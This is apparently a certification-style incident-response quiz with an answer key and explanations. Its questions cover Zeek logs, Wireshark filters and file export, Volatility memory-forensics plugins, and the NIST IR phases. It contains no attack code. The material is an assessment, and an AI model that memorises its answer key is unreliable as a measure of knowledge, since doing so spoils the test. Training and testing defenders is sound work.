Understanding the Incident Response process and tools quiz

Question 1

Which Zeek log file would you query to find information about resolved websites from the computers on the network?

Solution

dns.log

Question 2

You have been given a PCAP file and asked to analyze it. The customer has informed you that a malicious file was probably transferred into the environment during the breach in question. You also see evidence in the memory dump from the suspected breached machine that the attacker used the built-in Windows TFTP client to transfer a file down to the suspected breached machine. How would you extract this file transferred via TFTP from the traffic capture (PCAP) file in Wireshark? You are using Wireshark version 2.3.4 or later.

Solution

With the PCAP open in Wireshark, select File -> Export objects -> TFTP then select the suspect files.

Question 3

You have been hired to help respond to an incident. Once on the site, you are made aware that there is one system on the network which has been identified as compromised. The customer also informs you there's no traffic captures related to the device. Upon investigating the system, you discover that there is an unknown process running on it. You would like to extract the process/application and see what it does. What would be the BEST course of action?

Solution

• Perform a memory dump, then use the procdump feature of Volatility to dump the process to a file. Take the dumped process and run it in an isolated sandbox VM that's not connected to anything else

Dumping the process to a file and then putting it in a sandbox is the best answer. Dumping it and putting it on virustotal.com is bad because if the unknown process has harvested data from the internal network or that device, you may be inadvertently exposing that data to the public via virustotal.com. Installing too much additional software like an intrusive monitoring software could destroy some evidence as well as alert the threat actor as to your activity. It is never a good idea to put potentially malicious or unknown software on other production devices.

Question 4

You are examining a memory dump from a compromised machine and would like to see a breakdown of parent/child relationships of currently running processes. Which Volatility plugin would show this?

Solution

• pstree

The pstree plugin shows processes in a tree format emphasizing each process's relationship to its parent process. The pslist plugin lists running processes, but does not show relationship info in a tree format. The rel and hives options are not real plugins

Question 5

You have just been called in as an outside expert to help an organization with a data breach. They have not started a response process yet and are wanting you to start it. From the list of options here, what would you do FIRST?

Solution

• Ask them if they have an existing IR policy and/or playbook

One thing you never want to do is be responsible for having the organization violate its own IR policy. Therefore, it's best to find out if they have one and what it entails. Taking memory dumps is a good choice if you're only thinking in terms of technical steps; however, it's not the first thing that should happen, considering the handler may be new to the environment and internal processes and procedures. Starting triage is not a good first step. Assessing damage is not the best first step.

Question 6

Which Volatility plugin allows you to search for files in memory?

Solution

filescan

Question 7

Of the four NIST incident response life cycle steps, which would you consider things like "who can access certain information" and "whom to request the access from" to fall into?

Solution

• Preparation

Setting up and figuring out communications paths is usually associated with preparation. Doing this activity in any of the other three steps would be too late.

Question 8

You have been giving a 20 GB PCAP file of network traffic. You want to break this file down into smaller pieces to see things such as HTTP traffic and DNS traffic separated out into their own log files. What tool would you use for this?

Solution

• Zeek

20 GB would be too big for Wireshark and wouldn't create different logs. TCPdump wouldn't be able to create the different log files either. Volatility is for memory forensics, not network forensics.

Question 9

Which Volatility plugin would you use to find current and previous network connections for the machine you got the memory dump from?

Solution

• netscan

Sockscan shows sockets, but only for existing connections. Connections only shows existing connections as well. Cmdscan shows previous commands that were run. Netscan is the only plugin that shows both current connections and previous ones.

Question 10

Which feature of Wireshark allows you to reconstruct an entire TCP session?

Solution

Follow TCP stream

Question 11

You are looking at live traffic using Zeek. You need to be able to see TCP session state and session history for all connections. Which zeek option/command would you invoke with zeek-cut to show this information, and which Zeek log would you run it against?

Solution

history against the conn.log

Question 12

You have been given a memory dump to analyze for an IR case your team is working on. The person who gave you the memory dump is not sure of what the operating system is. What Volatility plugin allows you to scan the memory dump to find the operating system?

Solution

imageinfo

Question 13

You are analyzing a packet capture and want to isolate traffic between 192.168.2.10 and 74.56.28.27. Which Wireshark display filter would give you the appropriate view of the traffic between the two?

Solution

ip.addr == 192.168.2.10 && ip.addr == 74.56.28.27

Question 14

Question 14 You are analyzing a packet capture file and you want to see traffic from the IP address of 1.1.1.1 to 10.10.10.10, but only to or from port 3389. What would that Wireshark display filter look like?

Solution

ip.src == 1.1.1.1 && ip.dst == 10.10.10.10 && tcp.port == 3389

Question 15

What Linux command could you run against a raw memory dump and search for human-readable text?

Solution

• strings

"Strings" is the command for pulling human-readable text from memory dumps. "Cat" is for viewing text files, "top" is for viewing the processes using the most resources on a running Linux machine and "lsof" is also a process-based viewer.

Question 16

Which zeek-cut string would I use to see all conn.log traffic with source and destination IP and port, as well as the duration of each session?

Solution

zeek-cut < conn.log id.orig_h id.orig_p id.resp_h id.resp_p duration

Question 17

What volatility feature allows you to extract executable binaries from memory dumps?

Solution

procdump

Question 18

What common hacker/pentest tool would you use to see if known malware ports are still open on devices in your network after you've performed eradication?

Solution

nmap

Question 19

In which phase of IR does the process of making sure the threat can no longer spread happen?

Solution

Containment

Question 20

Which factors have contributed to hard drives being less and less of a source of data breach evidence? (Select TWO)

Solution

• Rapid adoption of cloud services.

• Attackers evolving to using fileless malware and "living off the land" without dropping binaries on the hard drive.